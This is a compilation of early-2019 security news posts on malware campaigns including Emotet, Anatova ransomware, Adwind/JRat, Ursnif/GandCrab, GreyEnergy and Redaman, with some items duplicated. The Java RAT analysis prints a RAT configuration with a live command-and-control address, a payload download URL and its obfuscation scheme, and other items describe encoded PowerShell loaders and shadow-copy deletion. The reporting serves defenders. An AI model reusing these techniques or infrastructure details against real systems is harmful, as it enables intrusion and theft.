Emotet es un malware diseñado para evitar ser detectado, atacar fuerte y multiplicarse. Todo ello gracias a numerosas actualizaciones, un diseño polimórfico y modular, y su habilidad para desarrollar diferentes ataques contra diferentes víctimas. Por lo que nos encontramos ante una amenaza cambiante para los administradores de sistemas. Durante sus cinco años de vida, Emotet […]

Kampf gegen einen agilen Gegner: Erkenntnisse von der Emotet-Front

Die Schadsoftware Emotet hat einen langen Atem und sucht mit ständig neuen Updates besonders perfide nach Lücken im System. Dennoch ist der Kampf nicht verloren – drei entscheidende Präventionsmaßnahmen können bereits effektiv helfen. Doch zunächst ein kleiner Exkurs zur Strategie der Cyberattacke: Der Trojaner Emotet ist darauf spezialisiert, Schutzbarrieren auszuweichen, immer wieder zuzuschlagen und sich […]

Emotet: A veritable Swiss Army knife of malicious capabilities

Formerly just a banking Trojan, Emotet is now one of the most dangerous and multifaceted malware out there. According to Malwarebytes, it and Trickbot are part of the reason why Trojans topped their list of most common business detections in 2018. Emotet’s capabilities Emotet’s initial incarnation dates back to 2014 but, in the intervening years, it has become a veritable Swiss Army knife of malicious capabilities. It can: Download additional malware (often Trickbot) Collect information … More

The post Emotet: A veritable Swiss Army knife of malicious capabilities appeared first on Help Net Security.

Malware: Three Industry Problems and How to Solve Them

In the last few years, organizations have been subject to extortion through ransomware. Now, hackers are bypassing the nasty business of trying to get people to give them cryptocurrency to simply hijacking your processor to mine for cryptocurrency. As a result, the methods employed are growing in sophistication and creativity, including using internet memes to […]… Read More

The post Malware: Three Industry Problems and How to Solve Them appeared first on The State of Security.

Razy Trojan Installs Malicious Browser Extensions to Steal Cryptocurrency

Security researchers observed the Razy Trojan installing malicious extensions across multiple web browsers to steal cryptocurrency.

In 2018, Kaspersky Lab noticed that the Trojan was being distributed via advertising blocks on websites and free file hosting services disguised as legitimate software. The malware uses different infection processes for Google Chrome, Mozilla Firefox and Yandex Browser, disabling automatic updates and integrity checks for installed extensions.

Razy then uses its main.js script to steal cryptocurrency by searching websites for the addresses of digital wallets. If it finds what it’s looking for, the Trojan replaces the wallet addresses with those controlled by the malware’s operators.

Razy can also spoof images of QR codes that point to cryptocurrency wallets, modify digital currency exchanges’ webpages by displaying messages that lure users with the promise of new features, and alter Google or Yandex search results to trick victims into visiting infected websites.

Not the First Cryptocurrency Stealer — And Likely Not the Last

The Razy Trojan isn’t the first malware known for stealing users’ cryptocurrency. In July 2018, for example, Fortinet came across a malware sample that modified victims’ clipboard content to replace a copied bitcoin address with one belonging to threat actors. Just a few months later, researchers at enSilo discovered DarkGate, malware that is capable of crypto-mining and ransomware-like behavior in addition to stealing virtual currency from victims’ wallets.

These malware samples played a part in the rise of cryptocurrency theft last year. In just the first six months of 2018, Carbon Black observed that digital currency theft reached $1.1 billion. One of the incidents that took place within that time period involved the theft of $530 million, as reported by CNN.

How to Defend Against Malware Like Razy

Security professionals can help defend against threats like Razy by incorporating artificial intelligence (AI) into their organizations’ malware defense strategies, including the use of AI in detectors and cyber deception to misdirect and deactivate AI-powered attacks. Experts also recommend using blockchain and other advanced technologies to protect against cryptocurrency threats.

The post Razy Trojan Installs Malicious Browser Extensions to Steal Cryptocurrency appeared first on Security Intelligence.

Beware; hackers are using malicious TeamViewer tool to spread malware

By Waqas

TeamViewer is a popular remote control desktop sharing software with more than 1 billion users and that makes it a lucrative target for cyber criminals. Recently, the IT security researchers at Trend Micro have uncovered a malware campaign targeting unsuspecting users with a malicious version of TeamViewer. Note: It is worth mentioning that the official website […]

This is a post from HackRead.com Read the original post: Beware; hackers are using malicious TeamViewer tool to spread malware

The Story of Manuel’s Java RAT

During the last weeks, the Cybaze-Yoroi ZLab researchers identified infection attempts aimed to install RAT malware directed to the naval industry sector. The malicious email messages contained a particular Adwind/JRat variant

The post The Story of Manuel’s Java RAT appeared first on The Cyber Security Place.

1 in 8 Businesses Are Destroyed by Data Breaches. Don’t Be a Statistic

I have frequently stated that one of the leading causes of business failures is poor cash flow management. According to a study by US Bank, 82% of all businesses that

The post 1 in 8 Businesses Are Destroyed by Data Breaches. Don’t Be a Statistic appeared first on The Cyber Security Place.

Hackers abusing Google App Engine to spread PDF malware

By Waqas

The Cobalt Strike advanced persistent threat (APT) group is using Google App Engine to spread PDF malware against financial firms. The IT security researchers at Netskope have discovered a sophisticated malware campaign in which cybercriminals are abusing Google App Engine (GCP), a web framework and cloud computing platform to deliver malware via PDF decoys. According to researchers, the malware campaign is currently […]

This is a post from HackRead.com Read the original post: Hackers abusing Google App Engine to spread PDF malware

Anatova ransomware – Expert believe it will be a dangerous threat

Security experts at McAfee have discovered a new malware, dubbed Anatova ransomware, that has been spotted infecting computers worldwide

The name Anatova is based on a name in the ransom note that is dropped on the infected systems.

The Anatova ransomware outstands for its obfuscation capabilities and ability to infect network shares, it has a modular structure that allows adding new functions to the malware.

“During our continuous hunt for new threats, we discovered a new ransomware family we call Anatova (based on the name of the ransom note). Anatova was discovered in a private peer-to-peer (p2p) network.” reads the analysis published by McAfee.

Malware experts from McAfee discovered the Anatova ransomware on a private peer-to-peer network.
Anatova uses the icon of a game or application to trick victims into download and execute it.

The malware uses a manifest to request admin rights, it implements multiple efficient protection techniques against static analysis, it makes a few checks to avoid running in a sandbox.

The malware demands $700 in ransom to decrypt the data.

The largest number of infections was observed in the United States, followed by Germany, Belgium, France, and the UK. It is interesting to note that the malware doesn’t infect systems from a list of the countries that includes all CIS countries, Syria, Egypt, Morocco, Iraq, and India.

Anatova ransomware

“It’s quite normal to see the CIS countries being excluded from execution and often an indicator that the authors might be originating from one of these countries.” continues the experts. “In this case it was surprising to see the other countries being mentioned. We do not have a clear hypothesis on why these countries in particular are excluded.”

The ransomware looks for files that are smaller than 1 MB and avoid encrypting files of the operating system. Anatova also checks for network shares, this is particularly dangerous in large organizations because a single infection can cause severe problems to several systems in the company network.

Each Anatova sample uses its own key, this implies that there’s no master key available that could be used to decrypt all victims files.

After encrypting the files, the ransomware will clean the memory of the key, IV, and private RSA key values, to prevent anyone dumping this information from memory and use it to decrypt files.

“When all this is done, Anatova will destroy the Volume Shadow copies 10 times in very quick succession. Like most ransomware families, it is using the vssadmin program, which required admin rights, to run and delete the volume shadow copies.” states McAfee.

According to McAfee, the Anatova ransomware was developed by skilled vxers, the researchers believe it is a prototype being tested and has the potential to become a serious threat.

Additional details, including IoCs. are reported in the analysis published by McAfee.

Pierluigi Paganini

(SecurityAffairs – Anatova ransomware, cybercrime)

The post Anatova ransomware – Expert believe it will be a dangerous threat appeared first on Security Affairs.

The Story of Manuel’s Java RAT.

Security experts from Cybaze-Yoroi ZLab investigated two malicious spam campaigns delivering Java RAT that show some similarities.

Introduction

During the last weeks, the Cybaze-Yoroi ZLab researchers identified infection attempts aimed to install RAT malware directed to the naval industry sector. The malicious email messages contained a particular Adwind/JRat variant delivered via several methods tailored to lure the target company. 

In the recent past, similar attack cases hit this industry, such as the MartyMCFly case, where the attackers weaponized their emails with QasarRAT payloads. Instead, in this case, Cybaze-Yoroi ZLab detected the usage of multiplatform Java malware.

Technical analysis

A preliminary analysis of the two malicious email waves shows no common strict indicators: the smtp infrastructure detected on the 16th and 17th is different from the 21tst one, the attachment type didn’t match, in fact, the first ones contained .jar attachments, the second ones ZIP archives and JS scripts, and the email theme was different too.

In detail, the first email wave has been prepared to simulate a purchase order, trying to impersonate administrative personnel of an italian company operating in the Hydraulic and Lifting sectors,  “Difast Srl”. These messages were written in Italian.

The second email wave, instead, was not Italian speaking anymore. This time the attacker were trying to impersonate a German logistic company, “Dederich Spedition”, simulating another kind of purchase order communication.

However, we figured out these two email waves were linked to the same attacker.

Dissecting the Stage1

The following attachments have been analyzed by Cybaze-Yoroi Zlab team:

HashSha 256:a17b18ba1d405569d3334f4d7c653bf784f07805133d7a1e2409c69c67a72d99
ThreatJAR/Dropper
ssdeep12288:1zdaHanWmyPL64RrYzX/6ZjHfTMmy7KUBjycRKXsfp330VPMsCXtZcLzSU:1zUHanW3DJRr0/ubfTK3hycjfx30VPMw
HashSha256:cb5389744825a8a8d97c0dce8eec977ae6d8eeca456076d294c142d81de94427
ThreatJAR/Dropper
ssdeep12288:LR9aQ+oSsyJZVqhoae1yjocYKLCpOo5q/mOmFgnxhQZMR:C4yuoCoflp1DFOxx
HashSha256:5b7192be8956a0a6972cd493349fe2c58bc64529aa1f62b9f0e2eaebe65829be
ThreatJS/Dropper
ssdeep12288:Vhz+1VYSCR8TedejbWcGrwmzt7cOk6O6vJX9SxmN6QjH9HJW93awECdf66bC8a:rzbsedejF1k1BXFRVJjXl

The first two malware samples were attached to the suspicious emails sent since 16th January. The last was embedded into the 21st January emails. 

Analyzing in detail the first two JAR archives, it’s possible to see the source code is the same, except for name of the declared classes. Thus, the analysis are conducted only on one of them. 

Figure 2 – Comparison between two jar file dropper

Differently from other ones, the JS file has a different structure how visible in the following figure.

Figure 3 – Code snippet of js file dropper

Despite the different structures of code and programming languages, all the dropper samples have the same encoded payload strings.

The string labeled with the variable name “duvet” hides another layer of code. The obfuscation method is quite easy: just replace the “#@>” character with “m”, and convert all from base64. The results of decryption is visible in the following figure:

Table 4 – First step decryption of base64 encoded string

In the previous code snippet, a malware routine checks the existence of the Java environment on the victim machine: if it is not installed it downloads the JRE environment from an external location, a potentially compromised third party website  “hxxp://www[.thegoldfingerinc[.]com/images/jre.zip”.

Figure 5 – Open directory used by malware to download jre.zip component

After downloading the JRE archive, the malware installs it on the victim machine. At this point, the malware triggers the persistence mechanism and sets the typical “CurrentVersion\Run” registry key.

Figure 7  – Register key setted by the malware

After many deobfuscation rounds of the nested base64 strings recovered, the final results is:

Figure 8 – result of decrypted code

The “longText” variable hides the final payload: another .jar file. Instead, decoding the variable “longText1”, we retrieved the following code snippet:

Figure 9 – fake listener on localhost setted by the malware in case of evasion

This code, able to create a localhost listener or a sort of proxy on port 7755, is actually unused by the other part of the RAT malware.

Converging to the Java RAT Payload

As anticipated before, the “longText” variable encodes a JAR executable containing the infamous, multi-platform (Win/macOS), Adwind/JRat malware: a Remote Access Tool well known to the InfoSec community.

HashSha256:9b2968eaeb219390a81215fc79cb78a5ccf0b41db13b3e416af619ed5982eb4a
ThreatAdwind/JRAT
ssdeep12288:jz8uQYmMzFIXJ9A2G5px
ogQNUhIK/0c2qnAv:EuQ/ImYnsS7B2qnk

The structure of the code seen in the above figure, indicates the fact that it is the canonical Adwind/JRat malware, containing the “JRat.io” false flag.

Figure 10 – Structure of JRat malware

Finally, we extrapolated the configuration of the RAT payload, the JSON object reported in the following snippet.

  1. {
  2. “NETWORK”:[
  3. {
  4. “PORT”:9888,
  5. “DNS”:”185.244.30.93″
  6. }
  7. ],
  8. “INSTALL”:true,
  9. “MODULE_PATH”:”KXA/Gzd/Sb.Po”,
  10. “PLUGIN_FOLDER”:”vuVCbHOEGdl”,
  11. “JRE_FOLDER”:”bvDMbv”,
  12. “JAR_FOLDER”:”oJYFGyiYDKG”,
  13. “JAR_EXTENSION”:”gHPrve”,
  14. “ENCRYPT_KEY”:”PqKOsNWuSwYdlCTuCJPnAGXoL”,
  15. “DELAY_INSTALL”:2,
  16. “NICKNAME”:”MANUEL1986″,
  17. “VMWARE”:false,
  18. “PLUGIN_EXTENSION”:”xSgaW”,
  19. “WEBSITE_PROJECT”:”https://jrat.io”,
  20. “JAR_NAME”:”GErbOAiLUBf”,
  21. “JAR_REGISTRY”:”NVxqGXNfpjm”,
  22. “DELAY_CONNECT”:2,
  23. “VBOX”:false
  24. }

The remote destination address 185.244.30.93, belonging to “Stajazk VPN” services,  hosts the control server reachable on port tcp/9888. Also, the configuration reveal the  nickname field containing the string “MANUEL1986”. 

The usage of the VPN service hides the real location of the attacker, however, the specific IP isn’t new to the threat intel community, it has been abused since october 2018. Particularly interesting is the presence of the No-IP domain “manuel.hopto.org”: this domain also resolved Nigerian IP addresses of the 37076-EMTS-NIGERIA-AS, and and the Italian AS1267 back in 2012-2014.

Figure 11 – “manuel.hopto.org” last DNSs of C2 of JRat

Conclusions

The analyzed case shows how threat actors may quickly vary attack techniques and artifact characteristics, trying to masquerade their intent by making harder to track their attempts. Proving the investigation capabilities of a threat research team are fundamental into a modern cyber security paradigm.

The specific attack waves are not likely related to the MartyMcFly campaign discovered a few months.

Further details, including IoCs and Yara Rules, are reported in the analysis published on the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – Java RAT, malware)

The post The Story of Manuel’s Java RAT. appeared first on Security Affairs.

Why You Need to Block the Threat Factory. Not Just the Threats.

 

Cyber criminals will create roughly 100 million new malware variants over the next 12 months. Security vendors will respond with new malware signatures and behaviors to stop them, but thousands of companies will be victimized in the process, experiencing costly or catastrophic breaches. This isn’t new - it’s a cycle.

Two distinct campaigns are spread GandCrab ransomware and Ursnif Trojan via weaponized docs

Security experts observed two distinct campaigns distributing the Ursnif malware, one of them also delivered the GandCrab ransomware.

Experts pointed out that the cybercrime gangs behind the two campaigns are different, but they discovered many similarities in them.

Attackers spread phishing messages using weaponized Microsoft Word document and leverages Powershell to deliver fileless malware.

Ursnif is a banking trojan that was spreading since November 2017, it is also able to monitor browsing activities, collect keystrokes, system and process information, and deliver additional payloads.

GandCrab is a popular ransomware that has been active since early 2018.

Security experts at Carbon Black observed nearly 180 variants of weaponized MS Word documents associated with one of the campaigns.

“This campaign originally came in via phishing emails that contained an attached Word document with embedded macros, Carbon Black located roughly 180 variants in the wild.”  reported Carbon Black.

The macro would call an encoded PowerShell script and then use a series of techniques to download and execute both a Ursnif and GandCrab

The first malware campaign distributing two malware threats was discovered by security researchers at Carbon Black who located approximately 180 variants of MS Word documents in the wild that target users with malicious VBS macros.

Once the victims have executed the malicious VBS macro it runs a PowerShell script that uses a series of techniques to download and execute both Ursnif and GandCrab.

Ursnif and GandCrab

The PowerShell script is encoded in base64, it executes the next stage malware, a PowerShell one-liner, that downloads the final malware payloads from the Pastebin website that is executed in memory.

The first payload is a PowerShell one-liner that evaluates the architecture of the targeted system and then accordingly downloads an additional payload from the Pastebin website, which is executed in the memory,

“Once the raw contents of the pastebin.com post were downloaded, that data would also be executed in memory.  In the variants that were obtained during this campaign the file contained a PowerShell script that was approximately 2800 lines.” reads the analysis.

“This PowerShell script is a version of the Empire Invoke-PSInject module, with very few modifications,” Carbon Black researchers said. “The script will take an embedded PE [Portable Executable] file that has been base64 encoded and inject that into the current PowerShell process.”

The final payload installs a variant of the GandCrab ransomware on the infected system, it also downloads a Ursnif executable from a remote server and executed it to gather information on the systems and monitor the victims’ activities.

“However, numerous Ursnif variants were hosted on the bevendbrec[.]com site during this campaign. Carbon Black was able to discover approximately 120 different Ursnif variants that were being hosted from the domains iscondisth[.]com and bevendbrec[.]com,” continue the analysis.

The activity of Ursnif malware was also observed by Cisco Talos that uncovered a second campaign using a different variant.
“There are three parts to the [PowerShell] command. The first part creates a function that is later used to decode base64 encoded PowerShell. The second part creates a byte array containing a malicious DLL,” Talos researchers explained.

“The third part executes the base64 decode function created in the first part, with a base64 encoded string as the parameter to the function. The returned decoded PowerShell is subsequently executed by the shorthand Invoke-Expression (iex) function.”

This variant, like others, collects information on the infected systems. The threat stores into a CAB file format and then sends the C2 server over HTTPS connection.

Early December, security experts at Yoroi-Cybaze ZLAB discovered a new variant of the Ursnif malware that hit Italian users through a malspam campaign. Researchers at Yoroi-Cybaze ZLAB isolated several malicious emails having the following content:

  • Subject: “VS Spedizione DHL AWB 94856978972 proveniente dalla GRAN BRETAGNA AVVISO DI GIACENZA”
  • Attachment: “GR930495-30495.zip”

The content of the attachment was a .js file and when it is launched, starts the infection by downloading other components from the Internet.

The whole infection was composed of four stages: the generation of network noise to hide the attacker’s infrastructure, the download of the executable payload, the achievement of persistence through the registry key installed and the checking and the download of the Ursnif modules.

Back to the current campaigns, both analyses include the list of indicators of compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – Ursnif, spam)

The post Two distinct campaigns are spread GandCrab ransomware and Ursnif Trojan via weaponized docs appeared first on Security Affairs.

Attackers successfully hide Mac malware in ad images

By Waqas

Malware campaigns have become quite regular on Apple devices and as per the new report from Confiant, a cyber-security firm, there’s a new group on the block called that is specifically targeting Apple users through malvertising. The group called VeryMal has employed steganography technique this time to prevent detection and hide the malicious code in […]

This is a post from HackRead.com Read the original post: Attackers successfully hide Mac malware in ad images

Vulnerable cloud infrastructure experiencing increasing attacks

Attackers are increasingly targeting vulnerable cloud infrastructure to exploit it for covert cryptojacking or to deliver ransomware, Securonix researchers warn. Some attacks are fairly trivial, but others are multi-vector/multi-platform threats where multiple functionalities are combined as part of the same malicious threat (e.g., XBash, which combines cryptomining, ransomware and botnet/worm activity). The way in The attacks are automated and probe the infrastructure and cloud services for vulnerabilities and/or weak or default login credentials. Among the … More

The post Vulnerable cloud infrastructure experiencing increasing attacks appeared first on Help Net Security.

Malspam Campaign Targeting Russian Speakers with Redaman Malware

An ongoing malicious spam campaign is currently targeting Russian-speaking users with samples of the Redaman banking malware. Since at least September 2018, the malspam campaign has been sending out malicious spam emails written in Russian to users who mostly have email addresses ending in “.ru.” The emails use various subject lines, message content and attachment […]… Read More

The post Malspam Campaign Targeting Russian Speakers with Redaman Malware appeared first on The State of Security.

GandCrab ransomware and Ursnif virus spreading via MS Word macros

Security researchers have discovered two separate malware campaigns, one of which is distributing the Ursnif data-stealing trojan and the GandCrab ransomware in the wild, whereas the second one is only infecting victims with Ursnif malware. Though both malware campaigns appear to be a work of two separate cybercriminal groups, we find many similarities in them. Both attacks start from

Security Affairs: Kaspersky links GreyEnergy and Zebrocy activities

Security experts from Kaspersky Lab’s Industrial Control Systems Cyber Emergency Response Team (ICS CERT) linked the GreyEnergy malware with and the Zebrocy backdoor.

Security researchers from Kaspersky Lab’s ICS CERT have discovered a link between GreyEnergy malware with and the Zebrocy tool.

The activity of the GreyEnergy APT group emerged in concurrence with BlackEnergy operations, experts consider the formed a successor of the latter group.

GreyEnergy has been active at least since 2015, it conducted reconnaissance and cyber espionage activities in Ukraine and Poland, it focused its activities on energy and transportation industries, and other high-value targets.

“Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and a Sofacy subset called “Zebrocy”. The Zebrocy activity was named after malware that Sofacy group began to use since mid-November 2015 for the post-exploitation stage of attacks on its victims. Zebrocy’s targets are widely spread across the Middle East, Europe and Asia and the targets’ profiles are mostly government-related.” reads the analysis published by Kaspersky.

“Both sets of activity used the same servers at the same time and targeted the same organization”

The GreyEnergy APT group leverages the GreyEnergy malware, a malicious code that implements a modular architecture to extend its capabilities by adding the appropriate modules. Experts pointed out that even if the malware hasn’t modules specifically designed to target ICS, the group has been targeting industrial workstations and SCADA systems.

The Zebrocy malware was used by Russia-linked APT28 group (aka Fancy BearPawn StormSofacy GroupSednit, and STRONTIUM), that operates under the Russian military agency GRU.

Experts at Kaspersky Lab have discovered that GreyEnergy and Zebrocy were using the same command and control (C&C) infrastructure, both used the same IP addresses associated with servers in Ukraine and Sweden.

greyenergy

The two malware were used simultaneously in June 2018 and both have been used in attacks aimed at a number of industrial companies in Kazakhstan. One of the attacks was carried out in June 2018.

The spear-phishing messages that were used in the attacks that involved both malware used similar documents that purported to come from Kazakhstan’s Ministry of Energy.

“Though no direct evidence exists on the origins of GreyEnergy, the links between a Sofacy subset known as Zebrocy and GreyEnergy suggest that these groups are related, as has been suggested before by some public analysis,” concludes Kaspersky.

The discovery made by Kaspersky is very important and shows the alleged evolution of the threats.

Sharing information about these APT groups and their TTPs could help organizations in detecting the malicious activities associated with the threat actors.

Pierluigi Paganini

(SecurityAffairs – hacking, BlackEnergy)

The post Kaspersky links GreyEnergy and Zebrocy activities appeared first on Security Affairs.



Security Affairs

Kaspersky links GreyEnergy and Zebrocy activities

Security experts from Kaspersky Lab’s Industrial Control Systems Cyber Emergency Response Team (ICS CERT) linked the GreyEnergy malware with and the Zebrocy backdoor.

Security researchers from Kaspersky Lab’s ICS CERT have discovered a link between GreyEnergy malware with and the Zebrocy tool.

The activity of the GreyEnergy APT group emerged in concurrence with BlackEnergy operations, experts consider the formed a successor of the latter group.

GreyEnergy has been active at least since 2015, it conducted reconnaissance and cyber espionage activities in Ukraine and Poland, it focused its activities on energy and transportation industries, and other high-value targets.

“Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and a Sofacy subset called “Zebrocy”. The Zebrocy activity was named after malware that Sofacy group began to use since mid-November 2015 for the post-exploitation stage of attacks on its victims. Zebrocy’s targets are widely spread across the Middle East, Europe and Asia and the targets’ profiles are mostly government-related.” reads the analysis published by Kaspersky.

“Both sets of activity used the same servers at the same time and targeted the same organization”

The GreyEnergy APT group leverages the GreyEnergy malware, a malicious code that implements a modular architecture to extend its capabilities by adding the appropriate modules. Experts pointed out that even if the malware hasn’t modules specifically designed to target ICS, the group has been targeting industrial workstations and SCADA systems.

The Zebrocy malware was used by Russia-linked APT28 group (aka Fancy BearPawn StormSofacy GroupSednit, and STRONTIUM), that operates under the Russian military agency GRU.

Experts at Kaspersky Lab have discovered that GreyEnergy and Zebrocy were using the same command and control (C&C) infrastructure, both used the same IP addresses associated with servers in Ukraine and Sweden.

greyenergy

The two malware were used simultaneously in June 2018 and both have been used in attacks aimed at a number of industrial companies in Kazakhstan. One of the attacks was carried out in June 2018.

The spear-phishing messages that were used in the attacks that involved both malware used similar documents that purported to come from Kazakhstan’s Ministry of Energy.

“Though no direct evidence exists on the origins of GreyEnergy, the links between a Sofacy subset known as Zebrocy and GreyEnergy suggest that these groups are related, as has been suggested before by some public analysis,” concludes Kaspersky.

The discovery made by Kaspersky is very important and shows the alleged evolution of the threats.

Sharing information about these APT groups and their TTPs could help organizations in detecting the malicious activities associated with the threat actors.

Pierluigi Paganini

(SecurityAffairs – hacking, BlackEnergy)

The post Kaspersky links GreyEnergy and Zebrocy activities appeared first on Security Affairs.

New Russian Language Malspam is delivering Redaman Banking Malware

A still ongoing spam campaign that has been active during the last months has been distributing the Redaman banking malware.

Experts at Palo Alto Networks continue to monitor an ongoing spam campaign that has been distributing the Redaman banking malware.

The malware was first observed in the threat landscape in 2015, most of the victims were customers of Russian financial institutions. The malicious code was initially reported as the RTM banking Trojan, both Symantec and Microsoft detected Redaman in 2017 and classified it as a variant of RTM.

Between September and December 2018 the experts observed a variant of the Redaman banking malware that was in Russian language and that was distributed via spam campaigns. 

Threat actors target Russian email recipients (email addresses ending in .ru) with messages using archived Windows executable files disguised as a PDF document.

“Since September of 2018, Redaman banking malware has been distributed through malspam. In this campaign, the Russian language malspam is addressed to Russian email recipients, often with email addresses ending in .ru.” reads the analysis published by Palo Alto Networks.

“These emails have file attachments. These file attachments are archived Windows executable files disguised as a PDF document.”

redaman infection chain

In the last campaign, Palo Alto Networks detected 3,845 email sessions with Redaman attachment.

The top 5 senders were Russia (3,456 sessions), Belarus (98), Ukraine (93), Estonia (29), and Germany (30), while the top 5 recipients were Russia (2,894), Netherlands (195), United States (55), Sweden (24), and Japan (16).

When Windows executable first run, the Redamhe checks for a series of files and directories that could indicate that the malware is running in a sandbox or a virtualized environment. It throws an exception and exits if any of those files are found.

When proceeds, the executable drops a DLL file in the AppData\Local\Temp\ directory and creates a folder under C:\ProgramData\, then moves the DLL there.

The malware achieves persistence using a scheduled Windows task that allows the execution of the DLL at user logon.

“After creating a scheduled task and causing the DLL to load, the initial Redaman executable file deletes itself. ” continues the analysis. 

Redaman uses an application-defined hook procedure to monitor browser activity, specifically Chrome, Firefox, and Internet Explorer. It then searches the local host for information related to the financial sector.”

The Redaman the activity of the most popular browsers (Chrome, Firefox, and Internet Explorer), it is able to download files, log keystrokes, capture screenshots and record video of the desktop, collect and exfiltrate financial data, monitor smart cards, shut down the infected host, modify DNS configuration, steal clipboard data, terminate running processes, and add certificates to the Windows store.

“Since it was first noted in 2015, this family of banking malware continues targeting recipients who conduct transactions with Russian financial institutions.” Palo Alto Networks concludes. 

“We found over 100 examples of malspam during the last four months of 2018. We expect to discover new Redaman samples as 2019 progresses,”

Pierluigi Paganini

(SecurityAffairs – Redaman banking Trojan, spam)

The post New Russian Language Malspam is delivering Redaman Banking Malware appeared first on Security Affairs.

Security Affairs: A still ongoing spam campaign that has been active during the last months has be…

A still ongoing spam campaign that has been active during the last months has been distributing the Redaman banking malware.

Experts at Palo Alto Networks continue to monitor an ongoing spam campaign that has been distributing the Redaman banking malware.

The malware was first observed in the threat landscape in 2015, most of the victims were customers of Russian financial institutions. The malicious code was initially reported as the RTM banking Trojan, both Symantec and Microsoft detected Redaman in 2017 and classified it as a variant of RTM.

Between September and December 2018 the experts observed a variant of the Redaman banking malware that was in Russian language and that was distributed via spam campaigns. 

Threat actors target Russian email recipients (email addresses ending in .ru) with messages using archived Windows executable files disguised as a PDF document.

“Since September of 2018, Redaman banking malware has been distributed through malspam. In this campaign, the Russian language malspam is addressed to Russian email recipients, often with email addresses ending in .ru.” reads the analysis published by Palo Alto Networks.

“These emails have file attachments. These file attachments are archived Windows executable files disguised as a PDF document.”

redaman infection chain

In the last campaign, Palo Alto Networks detected 3,845 email sessions with Redaman attachment.

The top 5 senders were Russia (3,456 sessions), Belarus (98), Ukraine (93), Estonia (29), and Germany (30), while the top 5 recipients were Russia (2,894), Netherlands (195), United States (55), Sweden (24), and Japan (16).

When Windows executable first run, the Redamhe checks for a series of files and directories that could indicate that the malware is running in a sandbox or a virtualized environment. It throws an exception and exits if any of those files are found.

When proceeds, the executable drops a DLL file in the AppData\Local\Temp\ directory and creates a folder under C:\ProgramData\, then moves the DLL there.

The malware achieves persistence using a scheduled Windows task that allows the execution of the DLL at user logon.

“After creating a scheduled task and causing the DLL to load, the initial Redaman executable file deletes itself. ” continues the analysis. 

Redaman uses an application-defined hook procedure to monitor browser activity, specifically Chrome, Firefox, and Internet Explorer. It then searches the local host for information related to the financial sector.”

The Redaman the activity of the most popular browsers (Chrome, Firefox, and Internet Explorer), it is able to download files, log keystrokes, capture screenshots and record video of the desktop, collect and exfiltrate financial data, monitor smart cards, shut down the infected host, modify DNS configuration, steal clipboard data, terminate running processes, and add certificates to the Windows store.

“Since it was first noted in 2015, this family of banking malware continues targeting recipients who conduct transactions with Russian financial institutions.” Palo Alto Networks concludes. 

“We found over 100 examples of malspam during the last four months of 2018. We expect to discover new Redaman samples as 2019 progresses,”

Pierluigi Paganini

(SecurityAffairs – Redaman banking Trojan, spam)

The post appeared first on Security Affairs.



Security Affairs

Malvertising Campaign Used Steganography to Distribute Shlayer Trojan

A short-lived malvertising campaign leveraged a steganography-based payload to target Mac users with the Shlayer trojan. Named for its use of veryield-malyst[dot]com as one of its ad-serving domains, the “VeryMal” threat actor conducted its malvertising campaign between 11 January 2019 and 13 January 2019. That’s not a long time period to remain active. But the […]… Read More

The post Malvertising Campaign Used Steganography to Distribute Shlayer Trojan appeared first on The State of Security.